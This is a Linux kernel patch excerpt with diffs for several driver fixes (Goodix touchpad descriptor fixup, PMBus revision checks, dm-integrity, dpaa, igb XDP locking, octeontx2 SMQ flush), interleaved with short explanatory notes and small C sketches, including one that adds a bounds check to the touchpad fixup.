++#define I2C_DEVICE_ID_GOODIX_01E9	0x01e9
+ #define I2C_DEVICE_ID_GOODIX_01F0	0x01f0
+ 
+ #define USB_VENDOR_ID_GOODTOUCH		0x1aad
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 17efe6e2a1a44c..8ef41d6e71d421 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1442,6 +1442,30 @@ static int mt_event(struct hid_device *hid, struct hid_field *field,
+ 	return 0;
+ }
+ 
++static __u8 *mt_report_fixup(struct hid_device *hdev, __u8 *rdesc,
++			     unsigned int *size)
++{
++	if (hdev->vendor == I2C_VENDOR_ID_GOODIX &&
++	    (hdev->product == I2C_DEVICE_ID_GOODIX_01E8 ||
++	     hdev->product == I2C_DEVICE_ID_GOODIX_01E9)) {
++		if (rdesc[607] == 0x15) {
++			rdesc[607] = 0x25;
++			dev_info(
++				&hdev->dev,
++				"GT7868Q report descriptor fixup is applied.\n");
++		} else {
++			dev_info(
++				&hdev->dev,
++				"The byte is not expected for fixing the report descriptor. \
++It's possible that the touchpad firmware is not suitable for applying the fix. \
++got: %x\n",
++				rdesc[607]);
++		}
++	}
++
++	return rdesc;
++}
++
+ static void mt_report(struct hid_device *hid, struct hid_report *report)
+ {
+ 	struct mt_device *td = hid_get_drvdata(hid);
+@@ -2038,6 +2062,14 @@ static const struct hid_device_id mt_devices[] = {
+ 		MT_BT_DEVICE(USB_VENDOR_ID_FRUCTEL,
+ 			USB_DEVICE_ID_GAMETEL_MT_MODE) },
+ 
++	/* Goodix GT7868Q devices */
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT_NSMU,
++	  HID_DEVICE(BUS_I2C, HID_GROUP_ANY, I2C_VENDOR_ID_GOODIX,
++		     I2C_DEVICE_ID_GOODIX_01E8) },
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT_NSMU,
++	  HID_DEVICE(BUS_I2C, HID_GROUP_ANY, I2C_VENDOR_ID_GOODIX,
++		     I2C_DEVICE_ID_GOODIX_01E9) },
++
+ 	/* GoodTouch panels */
+ 	{ .driver_data = MT_CLS_NSMU,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_GOODTOUCH,
+@@ -2273,6 +2305,7 @@ static struct hid_driver mt_driver = {
+ 	.feature_mapping = mt_feature_mapping,
+ 	.usage_table = mt_grabbed_usages,
+ 	.event = mt_event,
++	.report_fixup = mt_report_fixup,
+ 	.report = mt_report,
+ #ifdef CONFIG_PM
+ 	.suspend = mt_suspend,
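
One thing mt_report_fixup() does not do is validate *size before dereferencing rdesc[607]; a descriptor shorter than 608 bytes would be read out of bounds. A hedged sketch of the same patch logic with a length check added; the 608-byte minimum is an assumption derived from the fixed offset, not taken from the driver:

#include <stdio.h>
#include <stddef.h>

/* hypothetical bounds-checked variant of the GT7868Q fixup logic */
static void fixup_descriptor(unsigned char *rdesc, size_t size)
{
	if (size < 608)			/* assumed minimum so byte 607 exists */
		return;
	if (rdesc[607] == 0x15)		/* 0x15 = Logical Minimum item tag */
		rdesc[607] = 0x25;	/* 0x25 = Logical Maximum item tag */
}

int main(void)
{
	unsigned char rdesc[608] = { 0 };

	rdesc[607] = 0x15;
	fixup_descriptor(rdesc, sizeof(rdesc));
	printf("byte 607 is now 0x%02x\n", rdesc[607]);	/* 0x25 */
	return 0;
}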
+diff --git a/drivers/hwmon/pmbus/pmbus.h b/drivers/hwmon/pmbus/pmbus.h
+index 10fb17879f8ed9..0bbb8ae9341c31 100644
+--- a/drivers/hwmon/pmbus/pmbus.h
++++ b/drivers/hwmon/pmbus/pmbus.h
+@@ -409,6 +409,12 @@ enum pmbus_sensor_classes {
+ enum pmbus_data_format { linear = 0, ieee754, direct, vid };
+ enum vrm_version { vr11 = 0, vr12, vr13, imvp9, amd625mv };
+ 
++/* PMBus revision identifiers */
++#define PMBUS_REV_10 0x00	/* PMBus revision 1.0 */
++#define PMBUS_REV_11 0x11	/* PMBus revision 1.1 */
++#define PMBUS_REV_12 0x22	/* PMBus revision 1.2 */
++#define PMBUS_REV_13 0x33	/* PMBus revision 1.3 */
++
+ struct pmbus_driver_info {
+ 	int pages;		/* Total number of pages */
+ 	u8 phases[PMBUS_PAGES];	/* Number of phases per page */
+diff --git a/drivers/hwmon/pmbus/pmbus_core.c b/drivers/hwmon/pmbus/pmbus_core.c
+index 7ec04934747e12..4b73c7b27e9aae 100644
+--- a/drivers/hwmon/pmbus/pmbus_core.c
++++ b/drivers/hwmon/pmbus/pmbus_core.c
+@@ -84,6 +84,8 @@ struct pmbus_data {
+ 
+ 	u32 flags;		/* from platform data */
+ 
++	u8 revision;	/* The PMBus revision the device is compliant with */
++
+ 	int exponent[PMBUS_PAGES];
+ 				/* linear mode: exponent for output voltages */
+ 
+@@ -1093,9 +1095,14 @@ static int pmbus_get_boolean(struct i2c_client *client, struct pmbus_boolean *b,
+ 
+ 	regval = status & mask;
+ 	if (regval) {
+-		ret = _pmbus_write_byte_data(client, page, reg, regval);
+-		if (ret)
+-			goto unlock;
++		if (data->revision >= PMBUS_REV_12) {
++			ret = _pmbus_write_byte_data(client, page, reg, regval);
++			if (ret)
++				goto unlock;
++		} else {
++			pmbus_clear_fault_page(client, page);
++		}
+ 	}
+ 	if (s1 && s2) {
+ 		s64 v1, v2;
+@@ -2639,6 +2646,10 @@ static int pmbus_init_common(struct i2c_client *client, struct pmbus_data *data,
+ 			data->flags |= PMBUS_WRITE_PROTECTED | PMBUS_SKIP_STATUS_CHECK;
+ 	}
+ 
++	ret = i2c_smbus_read_byte_data(client, PMBUS_REVISION);
++	if (ret >= 0)
++		data->revision = ret;
++
+ 	if (data->info->pages)
+ 		pmbus_clear_faults(client);
+ 	else
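
The new PMBUS_REV_* constants follow the PMBUS_REVISION register encoding, where the upper nibble carries the Part I revision and the lower nibble the Part II revision; 0x22 therefore reads as revision 1.2, and the driver's plain numeric compare (data->revision >= PMBUS_REV_12) is sufficient. A tiny decoding example:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint8_t rev = 0x22;	/* as read from the PMBUS_REVISION register */

	/* upper nibble: Part I revision; lower nibble: Part II revision */
	printf("Part I : 1.%u\n", rev >> 4);
	printf("Part II: 1.%u\n", rev & 0x0f);
	return 0;
}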
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index b6749af4626205..d8c90a23a10144 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -189,6 +189,7 @@ static const char * const smbus_pnp_ids[] = {
+ 	"LEN2054", /* E480 */
+ 	"LEN2055", /* E580 */
+ 	"LEN2068", /* T14 Gen 1 */
++	"SYN3015", /* HP EliteBook 840 G2 */
+ 	"SYN3052", /* HP EliteBook 840 G4 */
+ 	"SYN3221", /* HP 15-ay000 */
+ 	"SYN323d", /* HP Spectre X360 13-w013dx */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index e9eb9554dd7bdc..bad238f69a7afd 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -627,6 +627,15 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook E756 */
++		/* https://bugzilla.suse.com/show_bug.cgi?id=1229056 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E756"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Fujitsu Lifebook E5411 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/ads7846.c b/drivers/input/touchscreen/ads7846.c
+index bed68a68f3303c..1f206c75c6cff7 100644
+--- a/drivers/input/touchscreen/ads7846.c
++++ b/drivers/input/touchscreen/ads7846.c
+@@ -810,7 +810,7 @@ static void ads7846_read_state(struct ads7846 *ts)
+ 		m = &ts->msg[msg_idx];
+ 		error = spi_sync(ts->spi, m);
+ 		if (error) {
+-			dev_err(&ts->spi->dev, "spi_sync --> %d\n", error);
++			dev_err_ratelimited(&ts->spi->dev, "spi_sync --> %d\n", error);
+ 			packet->ignore = true;
+ 			return;
+ 		}
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 696365f8f3b5fe..e0ffac93f900ee 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -2175,6 +2175,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 	unsigned int journal_section, journal_entry;
+ 	unsigned int journal_read_pos;
++	sector_t recalc_sector;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2308,6 +2309,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 			goto lock_retry;
+ 		}
+ 	}
++	recalc_sector = le64_to_cpu(ic->sb->recalc_sector);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+ 
+ 	if (unlikely(journal_read_pos != NOT_FOUND)) {
+@@ -2362,7 +2364,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 	if (need_sync_io) {
+ 		wait_for_completion_io(&read_comp);
+ 		if (ic->sb->flags & cpu_to_le32(SB_FLAG_RECALCULATING) &&
+-		    dio->range.logical_sector + dio->range.n_sectors > le64_to_cpu(ic->sb->recalc_sector))
++		    dio->range.logical_sector + dio->range.n_sectors > recalc_sector)
+ 			goto skip_check;
+ 		if (ic->mode == 'B') {
+ 			if (!block_bitmap_op(ic, ic->recalc_bitmap, dio->range.logical_sector,
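
The dm-integrity change reads ic->sb->recalc_sector once, while endio_wait.lock is still held, and compares against that snapshot after the unlock; re-reading the live field later would race with the recalculation thread updating it. A compact pthread sketch of the snapshot-under-lock pattern (names illustrative):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned long long recalc_sector;	/* updated by another thread */

static int already_recalculated(unsigned long long end_sector)
{
	unsigned long long snapshot;

	pthread_mutex_lock(&lock);
	snapshot = recalc_sector;	/* read once, under the lock */
	pthread_mutex_unlock(&lock);

	/* later comparisons use the stable snapshot, not the live field */
	return end_sector <= snapshot;
}

int main(void)
{
	recalc_sector = 1024;
	printf("%d\n", already_recalculated(512));	/* 1 */
	return 0;
}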
+diff --git a/drivers/misc/eeprom/digsy_mtc_eeprom.c b/drivers/misc/eeprom/digsy_mtc_eeprom.c
+index f1f766b709657b..4eddc5ba1af9c8 100644
+--- a/drivers/misc/eeprom/digsy_mtc_eeprom.c
++++ b/drivers/misc/eeprom/digsy_mtc_eeprom.c
+@@ -42,7 +42,7 @@ static void digsy_mtc_op_finish(void *p)
+ }
+ 
+ struct eeprom_93xx46_platform_data digsy_mtc_eeprom_data = {
+-	.flags		= EE_ADDR8,
++	.flags		= EE_ADDR8 | EE_SIZE1K,
+ 	.prepare	= digsy_mtc_op_prepare,
+ 	.finish		= digsy_mtc_op_finish,
+ };
+diff --git a/drivers/net/ethernet/faraday/ftgmac100.h b/drivers/net/ethernet/faraday/ftgmac100.h
+index 63b3e02fab162e..4968f6f0bdbc25 100644
+--- a/drivers/net/ethernet/faraday/ftgmac100.h
++++ b/drivers/net/ethernet/faraday/ftgmac100.h
+@@ -84,7 +84,7 @@
+ 			    FTGMAC100_INT_RPKT_BUF)
+ 
+ /* All the interrupts we care about */
+-#define FTGMAC100_INT_ALL (FTGMAC100_INT_RPKT_BUF  |  \
++#define FTGMAC100_INT_ALL (FTGMAC100_INT_RXTX  |  \
+ 			   FTGMAC100_INT_BAD)
+ 
+ /*
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 19506f2be4d401..6f5c22861dc9c2 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -2275,12 +2275,12 @@ static netdev_tx_t
+ dpaa_start_xmit(struct sk_buff *skb, struct net_device *net_dev)
+ {
+ 	const int queue_mapping = skb_get_queue_mapping(skb);
+-	bool nonlinear = skb_is_nonlinear(skb);
+ 	struct rtnl_link_stats64 *percpu_stats;
+ 	struct dpaa_percpu_priv *percpu_priv;
+ 	struct netdev_queue *txq;
+ 	struct dpaa_priv *priv;
+ 	struct qm_fd fd;
++	bool nonlinear;
+ 	int offset = 0;
+ 	int err = 0;
+ 
+@@ -2290,6 +2290,13 @@ dpaa_start_xmit(struct sk_buff *skb, struct net_device *net_dev)
+ 
+ 	qm_fd_clear_fd(&fd);
+ 
++	/* Packet data is always read as 32-bit words, so zero out any part of
++	 * the skb that might be sent if we have to pad the packet.
++	 */
++	if (__skb_put_padto(skb, ETH_ZLEN, false))
++		goto enomem;
++
++	nonlinear = skb_is_nonlinear(skb);
+ 	if (!nonlinear) {
+ 		/* We're going to store the skb backpointer at the beginning
+ 		 * of the data buffer, so we need a privately owned skb
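
The dpaa fix pads the skb to the 60-byte Ethernet minimum before anything else inspects it, because the hardware reads the buffer in 32-bit words and would otherwise transmit stale bytes past the payload; __skb_put_padto() zero-fills the extension. A hedged userspace analogue of zero-padding a short frame:

#include <stdio.h>
#include <string.h>

#define ETH_ZLEN 60	/* minimum Ethernet frame length, without FCS */

/* pad a short frame with zeroes so no stale memory is ever transmitted */
static size_t pad_frame(unsigned char *buf, size_t len, size_t cap)
{
	if (len < ETH_ZLEN && cap >= ETH_ZLEN) {
		memset(buf + len, 0, ETH_ZLEN - len);
		len = ETH_ZLEN;
	}
	return len;
}

int main(void)
{
	unsigned char frame[64] = "short payload";

	printf("padded length: %zu\n", pad_frame(frame, 13, sizeof(frame)));
	return 0;
}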
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 735f995a3a6879..dc4ce3bd412d2c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -3061,7 +3061,7 @@ ice_add_update_vsi_list(struct ice_hw *hw,
+ 
+ 		/* A rule already exists with the new VSI being added */
+ 		if (test_bit(vsi_handle, m_entry->vsi_list_info->vsi_map))
+-			return 0;
++			return -EEXIST;
+ 
+ 		/* Update the previously created VSI list set with
+ 		 * the new VSI ID passed in
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 76bd41058f3a9b..f2f719a952f8d5 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -34,6 +34,7 @@
+ #include <linux/bpf_trace.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/etherdevice.h>
++#include <linux/lockdep.h>
+ #ifdef CONFIG_IGB_DCA
+ #include <linux/dca.h>
+ #endif
+@@ -2915,8 +2916,11 @@ static int igb_xdp(struct net_device *dev, struct netdev_bpf *xdp)
+ 	}
+ }
+ 
++/* This function assumes __netif_tx_lock is held by the caller. */
+ static void igb_xdp_ring_update_tail(struct igb_ring *ring)
+ {
++	lockdep_assert_held(&txring_txq(ring)->_xmit_lock);
++
+ 	/* Force memory writes to complete before letting h/w know there
+ 	 * are new descriptors to fetch.
+ 	 */
+@@ -3001,11 +3005,11 @@ static int igb_xdp_xmit(struct net_device *dev, int n,
+ 		nxmit++;
+ 	}
+ 
+-	__netif_tx_unlock(nq);
+-
+ 	if (unlikely(flags & XDP_XMIT_FLUSH))
+ 		igb_xdp_ring_update_tail(tx_ring);
+ 
++	__netif_tx_unlock(nq);
++
+ 	return nxmit;
+ }
+ 
+@@ -8829,12 +8833,14 @@ static void igb_put_rx_buffer(struct igb_ring *rx_ring,
+ 
+ static int igb_clean_rx_irq(struct igb_q_vector *q_vector, const int budget)
+ {
++	unsigned int total_bytes = 0, total_packets = 0;
+ 	struct igb_adapter *adapter = q_vector->adapter;
+ 	struct igb_ring *rx_ring = q_vector->rx.ring;
+-	struct sk_buff *skb = rx_ring->skb;
+-	unsigned int total_bytes = 0, total_packets = 0;
+ 	u16 cleaned_count = igb_desc_unused(rx_ring);
++	struct sk_buff *skb = rx_ring->skb;
++	int cpu = smp_processor_id();
+ 	unsigned int xdp_xmit = 0;
++	struct netdev_queue *nq;
+ 	struct xdp_buff xdp;
+ 	u32 frame_sz = 0;
+ 	int rx_buf_pgcnt;
+@@ -8962,7 +8968,10 @@ static int igb_clean_rx_irq(struct igb_q_vector *q_vector, const int budget)
+ 	if (xdp_xmit & IGB_XDP_TX) {
+ 		struct igb_ring *tx_ring = igb_xdp_tx_queue_mapping(adapter);
+ 
++		nq = txring_txq(tx_ring);
++		__netif_tx_lock(nq, cpu);
+ 		igb_xdp_ring_update_tail(tx_ring);
++		__netif_tx_unlock(nq);
+ 	}
+ 
+ 	u64_stats_update_begin(&rx_ring->rx_syncp);
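
After this change every caller of igb_xdp_ring_update_tail() holds the netdev tx queue lock, and the new lockdep_assert_held() turns that contract into a runtime check on lockdep-enabled kernels. The shape of the contract, reduced to pthreads (the ring type is invented; pthreads has no lockdep, so a comment stands in for the assertion):

#include <pthread.h>
#include <stdio.h>

struct ring {
	pthread_mutex_t lock;
	unsigned int tail;
};

/* must be called with r->lock held; the driver asserts this via lockdep */
static void update_tail(struct ring *r)
{
	r->tail++;
}

static void xmit_flush(struct ring *r)
{
	pthread_mutex_lock(&r->lock);
	update_tail(r);		/* tail bump stays inside the critical section */
	pthread_mutex_unlock(&r->lock);
}

int main(void)
{
	struct ring r = { PTHREAD_MUTEX_INITIALIZER, 0 };

	xmit_flush(&r);
	printf("tail = %u\n", r.tail);
	return 0;
}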
+diff --git a/drivers/net/ethernet/jme.c b/drivers/net/ethernet/jme.c
+index 1732ec3c3dbdc4..a718207988f2c4 100644
+--- a/drivers/net/ethernet/jme.c
++++ b/drivers/net/ethernet/jme.c
+@@ -946,15 +946,13 @@ jme_udpsum(struct sk_buff *skb)
+ 	if (skb->protocol != htons(ETH_P_IP))
+ 		return csum;
+ 	skb_set_network_header(skb, ETH_HLEN);
+-	if ((ip_hdr(skb)->protocol != IPPROTO_UDP) ||
+-	    (skb->len < (ETH_HLEN +
+-			(ip_hdr(skb)->ihl << 2) +
+-			sizeof(struct udphdr)))) {
++
++	if (ip_hdr(skb)->protocol != IPPROTO_UDP ||
++	    skb->len < (ETH_HLEN + ip_hdrlen(skb) + sizeof(struct udphdr))) {
+ 		skb_reset_network_header(skb);
+ 		return csum;
+ 	}
+-	skb_set_transport_header(skb,
+-			ETH_HLEN + (ip_hdr(skb)->ihl << 2));
++	skb_set_transport_header(skb, ETH_HLEN + ip_hdrlen(skb));
+ 	csum = udp_hdr(skb)->check;
+ 	skb_reset_transport_header(skb);
+ 	skb_reset_network_header(skb);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index a3ae21398ca74e..fc0f3398a556bb 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -286,6 +286,21 @@ struct nix_mark_format {
+ 	u32 *cfg;
+ };
+ 
++/* smq(flush) to tl1 cir/pir info */
++struct nix_smq_tree_ctx {
++	u16 schq;
++	u64 cir_off;
++	u64 cir_val;
++	u64 pir_off;
++	u64 pir_val;
++};
++
++/* smq flush context */
++struct nix_smq_flush_ctx {
++	int smq;
++	struct nix_smq_tree_ctx smq_tree_ctx[NIX_TXSCH_LVL_CNT];
++};
++
+ struct npc_pkind {
+ 	struct rsrc_bmap rsrc;
+ 	u32	*pfchan_map;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index ef526408b0bd28..7ed0eb9bd4ed2f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -2121,13 +2121,127 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 	return rc;
+ }
+ 
++static void nix_smq_flush_fill_ctx(struct rvu *rvu, int blkaddr, int smq,
++				   struct nix_smq_flush_ctx *smq_flush_ctx)
++{
++	struct nix_smq_tree_ctx *smq_tree_ctx;
++	u64 parent_off, regval;
++	u16 schq;
++	int lvl;
++
++	smq_flush_ctx->smq = smq;
++
++	schq = smq;
++	for (lvl = NIX_TXSCH_LVL_SMQ; lvl <= NIX_TXSCH_LVL_TL1; lvl++) {
++		smq_tree_ctx = &smq_flush_ctx->smq_tree_ctx[lvl];
++		smq_tree_ctx->schq = schq;
++		if (lvl == NIX_TXSCH_LVL_TL1) {
++			smq_tree_ctx->cir_off = NIX_AF_TL1X_CIR(schq);
++			smq_tree_ctx->pir_off = 0;
++			smq_tree_ctx->pir_val = 0;
++			parent_off = 0;
++		} else if (lvl == NIX_TXSCH_LVL_TL2) {
++			smq_tree_ctx->cir_off = NIX_AF_TL2X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL2X_PIR(schq);
++			parent_off = NIX_AF_TL2X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_TL3) {
++			smq_tree_ctx->cir_off = NIX_AF_TL3X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL3X_PIR(schq);
++			parent_off = NIX_AF_TL3X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_TL4) {
++			smq_tree_ctx->cir_off = NIX_AF_TL4X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL4X_PIR(schq);
++			parent_off = NIX_AF_TL4X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_MDQ) {
++			smq_tree_ctx->cir_off = NIX_AF_MDQX_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_MDQX_PIR(schq);
++			parent_off = NIX_AF_MDQX_PARENT(schq);
++		}
++		/* save cir/pir register values */
++		smq_tree_ctx->cir_val = rvu_read64(rvu, blkaddr, smq_tree_ctx->cir_off);
++		if (smq_tree_ctx->pir_off)
++			smq_tree_ctx->pir_val = rvu_read64(rvu, blkaddr, smq_tree_ctx->pir_off);
++
++		/* get parent txsch node */
++		if (parent_off) {
++			regval = rvu_read64(rvu, blkaddr, parent_off);
++			schq = (regval >> 16) & 0x1FF;
++		}
++	}
++}
++
++static void nix_smq_flush_enadis_xoff(struct rvu *rvu, int blkaddr,
++				      struct nix_smq_flush_ctx *smq_flush_ctx, bool enable)
++{
++	struct nix_txsch *txsch;
++	struct nix_hw *nix_hw;
++	int tl2, tl2_schq;
++	u64 regoff;
++
++	nix_hw = get_nix_hw(rvu->hw, blkaddr);
++	if (!nix_hw)
++		return;
++
++	/* loop through all TL2s with matching PF_FUNC */
++	txsch = &nix_hw->txsch[NIX_TXSCH_LVL_TL2];
++	tl2_schq = smq_flush_ctx->smq_tree_ctx[NIX_TXSCH_LVL_TL2].schq;
++	for (tl2 = 0; tl2 < txsch->schq.max; tl2++) {
++		/* skip the smq(flush) TL2 */
++		if (tl2 == tl2_schq)
++			continue;
++		/* skip unused TL2s */
++		if (TXSCH_MAP_FLAGS(txsch->pfvf_map[tl2]) & NIX_TXSCHQ_FREE)
++			continue;
++		/* skip if PF_FUNC doesn't match */
++		if ((TXSCH_MAP_FUNC(txsch->pfvf_map[tl2]) & ~RVU_PFVF_FUNC_MASK) !=
++		    (TXSCH_MAP_FUNC(txsch->pfvf_map[tl2_schq] &
++				    ~RVU_PFVF_FUNC_MASK)))
++			continue;
++		/* enable/disable XOFF */
++		regoff = NIX_AF_TL2X_SW_XOFF(tl2);
++		if (enable)
++			rvu_write64(rvu, blkaddr, regoff, 0x1);
++		else
++			rvu_write64(rvu, blkaddr, regoff, 0x0);
++	}
++}
++
++static void nix_smq_flush_enadis_rate(struct rvu *rvu, int blkaddr,
++				      struct nix_smq_flush_ctx *smq_flush_ctx, bool enable)
++{
++	u64 cir_off, pir_off, cir_val, pir_val;
++	struct nix_smq_tree_ctx *smq_tree_ctx;
++	int lvl;
++
++	for (lvl = NIX_TXSCH_LVL_SMQ; lvl <= NIX_TXSCH_LVL_TL1; lvl++) {
++		smq_tree_ctx = &smq_flush_ctx->smq_tree_ctx[lvl];
++		cir_off = smq_tree_ctx->cir_off;
++		cir_val = smq_tree_ctx->cir_val;
++		pir_off = smq_tree_ctx->pir_off;
++		pir_val = smq_tree_ctx->pir_val;
++
++		if (enable) {
++			rvu_write64(rvu, blkaddr, cir_off, cir_val);
++			if (lvl != NIX_TXSCH_LVL_TL1)
++				rvu_write64(rvu, blkaddr, pir_off, pir_val);
++		} else {
++			rvu_write64(rvu, blkaddr, cir_off, 0x0);
++			if (lvl != NIX_TXSCH_LVL_TL1)
++				rvu_write64(rvu, blkaddr, pir_off, 0x0);
++		}
++	}
++}
++
+ static int nix_smq_flush(struct rvu *rvu, int blkaddr,
+ 			 int smq, u16 pcifunc, int nixlf)
+ {
++	struct nix_smq_flush_ctx *smq_flush_ctx;
++	int err, restore_tx_en = 0, i;
+ 	int pf = rvu_get_pf(pcifunc);
+ 	u8 cgx_id = 0, lmac_id = 0;
+-	int err, restore_tx_en = 0;
+-	u64 cfg;
++	u16 tl2_tl3_link_schq;
++	u8 link, link_level;
++	u64 cfg, bmap = 0;
+ 
+ 	/* enable cgx tx if disabled */
+ 	if (is_pf_cgxmapped(rvu, pf)) {
+@@ -2136,22 +2250,69 @@ static int nix_smq_flush(struct rvu *rvu, int blkaddr,
+ 						   lmac_id, true);
+ 	}
+ 
+-	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
+-	/* Do SMQ flush and set enqueue xoff */
+-	cfg |= BIT_ULL(50) | BIT_ULL(49);
+-	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++	/* XOFF all TL2s whose parent TL1 matches SMQ tree TL1 */
++	smq_flush_ctx = kzalloc(sizeof(*smq_flush_ctx), GFP_KERNEL);
++	if (!smq_flush_ctx)
++		return -ENOMEM;
++	nix_smq_flush_fill_ctx(rvu, blkaddr, smq, smq_flush_ctx);
++	nix_smq_flush_enadis_xoff(rvu, blkaddr, smq_flush_ctx, true);
++	nix_smq_flush_enadis_rate(rvu, blkaddr, smq_flush_ctx, false);
+ 
+ 	/* Disable backpressure from physical link,
+ 	 * otherwise SMQ flush may stall.
+ 	 */
+ 	rvu_cgx_enadis_rx_bp(rvu, pf, false);
+ 
++	link_level = rvu_read64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL) & 0x01 ?
++			NIX_TXSCH_LVL_TL3 : NIX_TXSCH_LVL_TL2;
++	tl2_tl3_link_schq = smq_flush_ctx->smq_tree_ctx[link_level].schq;
++	link = smq_flush_ctx->smq_tree_ctx[NIX_TXSCH_LVL_TL1].schq;
++
++	/* SMQ set enqueue xoff */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
++	cfg |= BIT_ULL(50);
++	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++
++	/* Clear all NIX_AF_TL3_TL2_LINK_CFG[ENA] for the TL3/TL2 queue */
++	for (i = 0; i < (rvu->hw->cgx_links + rvu->hw->lbk_links); i++) {
++		cfg = rvu_read64(rvu, blkaddr,
++				 NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link));
++		if (!(cfg & BIT_ULL(12)))
++			continue;
++		bmap |= (1 << i);
++		cfg &= ~BIT_ULL(12);
++		rvu_write64(rvu, blkaddr,
++			    NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link), cfg);
++	}
++
++	/* Do SMQ flush and set enqueue xoff */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
++	cfg |= BIT_ULL(50) | BIT_ULL(49);
++	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++
+ 	/* Wait for flush to complete */
+ 	err = rvu_poll_reg(rvu, blkaddr,
+ 			   NIX_AF_SMQX_CFG(smq), BIT_ULL(49), true);
+ 	if (err)
+-		dev_err(rvu->dev,
+-			"NIXLF%d: SMQ%d flush failed\n", nixlf, smq);
++		dev_info(rvu->dev,
++			 "NIXLF%d: SMQ%d flush failed, txlink might be busy\n",
++			 nixlf, smq);
++
++	/* Set NIX_AF_TL3_TL2_LINKX_CFG[ENA] for the TL3/TL2 queue */
++	for (i = 0; i < (rvu->hw->cgx_links + rvu->hw->lbk_links); i++) {
++		if (!(bmap & (1 << i)))
++			continue;
++		cfg = rvu_read64(rvu, blkaddr,
++				 NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link));
++		cfg |= BIT_ULL(12);
++		rvu_write64(rvu, blkaddr,
++			    NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link), cfg);
++	}
++
++	/* clear XOFF on TL2s */
++	nix_smq_flush_enadis_rate(rvu, blkaddr, smq_flush_ctx, true);
++	nix_smq_flush_enadis_xoff(rvu, blkaddr, smq_flush_ctx, false);
++	kfree(smq_flush_ctx);
+ 
+ 	rvu_cgx_enadis_rx_bp(rvu, pf, true);
+ 	/* restore cgx tx state */
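
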